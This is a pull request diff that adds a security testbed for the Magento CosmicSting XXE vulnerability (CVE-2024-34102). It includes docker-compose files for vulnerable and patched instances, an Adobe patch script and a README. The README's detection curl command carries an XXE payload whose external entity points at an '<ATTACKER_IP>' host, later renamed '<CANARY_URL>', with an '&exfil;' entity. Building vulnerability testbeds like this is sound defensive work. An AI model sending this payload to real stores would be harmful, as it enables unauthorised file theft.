### PR TITLE
Magento CosmicSting XXE Testbed

### DIFF
--- a/magento/CVE-2024-34102_CosmicSting/README.md
+++ b/magento/CVE-2024-34102_CosmicSting/README.md
@@ -1,0 +1,33 @@
+# Magento / Adobe Commerce CosmicSting RCE (CVE-2024-34102)
+
+## Description
+Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that could allow arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) could be accomplished by combining the issue with another vulnerability.
+
+## Launch Testbed
+
+### Vulnerable version
+Launch vulnerable version: Magento v2.4.7-p0.
+```sh
+docker compose -f docker-compose-vuln.yml up
+```
+
+### Safe version
+Launch safe version: Magento v2.4.7-p2.
+```sh
+docker compose -f docker-compose-safe.yml up
+```
+
+## Affected Versions
+- 2.4.7 and earlier
+- 2.4.6-p5 and earlier
+- 2.4.5-p7 and earlier
+- 2.4.4-p8 and earlier
+- 2.4.3-ext-7 and earlier*
+- 2.4.2-ext-7 and earlier*
+
+*These versions are only applicable to customers participating in the Extended Support Program
+
+## References
+- https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102
+- https://nvd.nist.gov/vuln/detail/CVE-2024-34102
+- https://helpx.adobe.com/security/products/magento/apsb24-40.html

--- a/magento/CVE-2024-34102_CosmicSting/README.md
+++ b/magento/CVE-2024-34102_CosmicSting/README.md
@@ -29,7 +29,7 @@ curl -k -X POST \
         "collectorList": {
           "totalCollector": {
             "sourceData": {
-              "data": "<?xml version=\"1.0\" ?><!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://<ATTACKER_IP>/dtd.xml\"> %sp; %param1; ]><r>&exfil;</r>",
+              "data": "<?xml version=\"1.0\" ?><!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"<CANARY_URL>\"> %sp; %param1; ]><r>&exfil;</r>",
               "options": 16
             }
           }
@@ -47,7 +47,7 @@ while a safe instance will output the following:
 ```json
 {"message":"Invalid data type"}
 ```
-Moreover, you can replace `<ATTACKER_IP>` with the URL of a request canary service (such as Burp Collaborator) to verify if you receive a callback. A safe instance will not fetch the URL, while a vulnerable one will.
+Moreover, you can replace `<CANARY_URL>` with the URL of a request canary service (such as Burp Collaborator) to verify if you receive a callback. A safe instance will not fetch the URL, while a vulnerable one will.
 
 ## Affected Versions
 - 2.4.7 and earlier

--- a/magento/CVE-2024-34102_CosmicSting/README.md
+++ b/magento/CVE-2024-34102_CosmicSting/README.md
@@ -1,7 +1,7 @@
-# Magento / Adobe Commerce CosmicSting RCE (CVE-2024-34102)
+# Magento / Adobe Commerce CosmicSting XXE (CVE-2024-34102)
 
 ## Description
-Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that could allow arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) could be accomplished by combining the issue with another vulnerability.
+Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that could allow arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) could be accomplished by combining the issue with another vulnerability, such as the [PHP iconv RCE](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1).
 
 ## Launch Testbed
 
@@ -28,6 +28,6 @@ docker compose -f docker-compose-safe.yml up
 *These versions are only applicable to customers participating in the Extended Support Program
 
 ## References
-- https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102
-- https://nvd.nist.gov/vuln/detail/CVE-2024-34102
-- https://helpx.adobe.com/security/products/magento/apsb24-40.html
+- [CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)](https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102)
+- [NIST: CVE-2024-34102](https://nvd.nist.gov/vuln/detail/CVE-2024-34102)
+- [Adobe Security Bulletin APSB24-40](https://helpx.adobe.com/security/products/magento/apsb24-40.html)

--- a/magento/CVE-2024-34102_CosmicSting/README.md
+++ b/magento/CVE-2024-34102_CosmicSting/README.md
@@ -17,6 +17,38 @@ Launch safe version: Magento v2.4.7-p2.
 docker compose -f docker-compose-safe.yml up
 ```
 
+## Vulnerability Test
+You can use the following command to check whether the instance is vulnerable or not (credits to vicarius.io):
+```sh
+curl -k -X POST \
+  http://127.0.0.1:8081/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \
+  -H "Content-Type: application/json" \
+  -d '{
+    "address": {
+      "totalsReader": {
+        "collectorList": {
+          "totalCollector": {
+            "sourceData": {
+              "data": "<?xml version=\"1.0\" ?><!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://<ATTACKER_IP>/dtd.xml\"> %sp; %param1; ]><r>&exfil;</r>",
+              "options": 16
+            }
+          }
+        }
+      }
+    }
+  }'
+```
+
+A vulnerable instance will reply with the following message:
+```json
+{"message":"Internal Error. Details are available in Magento log file. Report ID: webapi-66d8a8d363765"}
+```
+while a safe instance will output the following:
+```json
+{"message":"Invalid data type"}
+```
+Moreover, you can replace `<ATTACKER_IP>` with the URL of a request canary service (such as Burp Collaborator) to verify if you receive a callback. A safe instance will not fetch the URL, while a vulnerable one will.
+
 ## Affected Versions
 - 2.4.7 and earlier
 - 2.4.6-p5 and earlier

--- a/magento/CVE-2024-34102_CosmicSting/README.md
+++ b/magento/CVE-2024-34102_CosmicSting/README.md
@@ -1,7 +1,7 @@
 # Magento / Adobe Commerce CosmicSting XXE (CVE-2024-34102)
 
 ## Description
-Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that could allow arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) could be accomplished by combining the issue with another vulnerability, such as the [PHP iconv RCE](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1).
+Adobe Commerce and Magento v2.4.7 and earlier are vulnerable to a critical unauthenticated XXE (XML External Entity) vulnerability that can lead to arbitrary code execution. The vulnerability can be exploited by sending an unauthenticated HTTP request with a crafted XML file that references external entities; when the request payload is deserialized, the attacker can extract sensitive files from the system and gain administrative access to the software. Remote Code Execution (RCE) can accomplished by combining this issue with another vulnerability, such as the [PHP iconv RCE](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1).
 
 ## Launch Testbed
 

--- a/magento/CVE-2024-34102_CosmicSting/README.md
+++ b/magento/CVE-2024-34102_CosmicSting/README.md
@@ -21,7 +21,7 @@ docker compose -f docker-compose-safe.yml up
 You can use the following command to check whether the instance is vulnerable or not (credits to vicarius.io):
 ```sh
 curl -k -X POST \
-  http://127.0.0.1:8081/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \
+  http://127.0.0.1:8080/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods \
   -H "Content-Type: application/json" \
   -d '{
     "address": {

--- a/magento/CVE-2024-34102_CosmicSting/apply-patch.sh
+++ b/magento/CVE-2024-34102_CosmicSting/apply-patch.sh
@@ -1,0 +1,18 @@
+#!/bin/bash
+
+echo "==== Patching Magento against CosmicSting XXE (CVE-2024-34102)"
+echo "Installing tools needed to apply patch"
+export DEBIAN_FRONTEND=noninteractive
+apt-get update -y
+apt-get install -y wget unzip patch
+
+echo "Downloading patch from Adobe's website"
+cd /opt/bitnami/magento
+wget "https://experienceleague.adobe.com/docs/commerce-knowledge-base/assets/VULN-27015-2.4.7x_v2_COMPOSER_patch.zip"
+unzip -o VULN-27015-2.4.7x_v2_COMPOSER_patch.zip
+
+echo "Applying patch"
+patch -p1 < VULN-27015-2.4.7x_v2.composer.patch
+
+echo "==== Patching done. Starting Magento now. ===="
+/opt/bitnami/scripts/magento/entrypoint.sh /opt/bitnami/scripts/magento/run.sh

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
@@ -1,0 +1,30 @@
+# Original from: https://raw.githubusercontent.com/bitnami/containers/main/bitnami/magento/docker-compose.yml
+# Copyright Broadcom, Inc. All Rights Reserved.
+# SPDX-License-Identifier: APACHE-2.0
+
+name: magento-safe
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_magento
+      - MARIADB_DATABASE=bitnami_magento
+  magento:
+    image: docker.io/bitnami/magento:2.4.7-debian-12-r15
+    ports:
+      - '8080:8080'
+    environment:
+      - MAGENTO_HOST=localhost
+      - MAGENTO_DATABASE_HOST=mariadb
+      - MAGENTO_DATABASE_PORT_NUMBER=3306
+      - MAGENTO_DATABASE_USER=bn_magento
+      - MAGENTO_DATABASE_NAME=bitnami_magento
+      - ELASTICSEARCH_HOST=elasticsearch
+      - ELASTICSEARCH_PORT_NUMBER=9200
+      - ALLOW_EMPTY_PASSWORD=yes
+    depends_on:
+      - mariadb
+      - elasticsearch
+  elasticsearch:
+    image: docker.io/bitnami/elasticsearch:7

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
@@ -13,7 +13,7 @@ services:
   magento:
     image: docker.io/bitnami/magento:2.4.7-debian-12-r15
     ports:
-      - '8080:8080'
+      - '8082:8080'
     environment:
       - MAGENTO_HOST=localhost
       - MAGENTO_DATABASE_HOST=mariadb
@@ -26,5 +26,9 @@ services:
     depends_on:
       - mariadb
       - elasticsearch
+    # The apply-patch.sh script will apply the vulnerability patch before Magento is set up
+    volumes:
+      - './apply-patch.sh:/apply-patch.sh'
+    command: /apply-patch.sh
   elasticsearch:
     image: docker.io/bitnami/elasticsearch:7

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
@@ -13,7 +13,7 @@ services:
   magento:
     image: docker.io/bitnami/magento:2.4.7-debian-12-r15
     ports:
-      - '8082:8080'
+      - '8080:8080'
     environment:
       - MAGENTO_HOST=localhost
       - MAGENTO_DATABASE_HOST=mariadb

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-safe.yml
@@ -15,7 +15,7 @@ services:
     ports:
       - '8080:8080'
     environment:
-      - MAGENTO_HOST=localhost
+      - MAGENTO_HOST=127.0.0.1:8080
       - MAGENTO_DATABASE_HOST=mariadb
       - MAGENTO_DATABASE_PORT_NUMBER=3306
       - MAGENTO_DATABASE_USER=bn_magento

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml
@@ -1,0 +1,30 @@
+# Original from: https://raw.githubusercontent.com/bitnami/containers/main/bitnami/magento/docker-compose.yml
+# Copyright Broadcom, Inc. All Rights Reserved.
+# SPDX-License-Identifier: APACHE-2.0
+
+name: magento-vulnerable
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_magento
+      - MARIADB_DATABASE=bitnami_magento
+  magento:
+    image: docker.io/bitnami/magento:2.4.7-debian-12-r4
+    ports:
+      - '8080:8080'
+    environment:
+      - MAGENTO_HOST=localhost
+      - MAGENTO_DATABASE_HOST=mariadb
+      - MAGENTO_DATABASE_PORT_NUMBER=3306
+      - MAGENTO_DATABASE_USER=bn_magento
+      - MAGENTO_DATABASE_NAME=bitnami_magento
+      - ELASTICSEARCH_HOST=elasticsearch
+      - ELASTICSEARCH_PORT_NUMBER=9200
+      - ALLOW_EMPTY_PASSWORD=yes
+    depends_on:
+      - mariadb
+      - elasticsearch
+  elasticsearch:
+    image: docker.io/bitnami/elasticsearch:7

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml
@@ -15,7 +15,7 @@ services:
     ports:
       - '8080:8080'
     environment:
-      - MAGENTO_HOST=localhost
+      - MAGENTO_HOST=127.0.0.1:8080
       - MAGENTO_DATABASE_HOST=mariadb
       - MAGENTO_DATABASE_PORT_NUMBER=3306
       - MAGENTO_DATABASE_USER=bn_magento

--- a/magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml
+++ b/magento/CVE-2024-34102_CosmicSting/docker-compose-vuln.yml
@@ -11,7 +11,7 @@ services:
       - MARIADB_USER=bn_magento
       - MARIADB_DATABASE=bitnami_magento
   magento:
-    image: docker.io/bitnami/magento:2.4.7-debian-12-r4
+    image: docker.io/bitnami/magento:2.4.7-debian-12-r15
     ports:
       - '8080:8080'
     environment:


### PR DESCRIPTION
Pretty straightforward testbed with the 2 testbeds for the vulnerable and safe configurations.

About the safe one, turns out the latest Magento image hosted on bitnami is still vulnerable, so I had to manually apply the patch released by Adobe. When bitnami updates the image to a patched one we can consider just changing the version number in the compose file and remove the manual patching.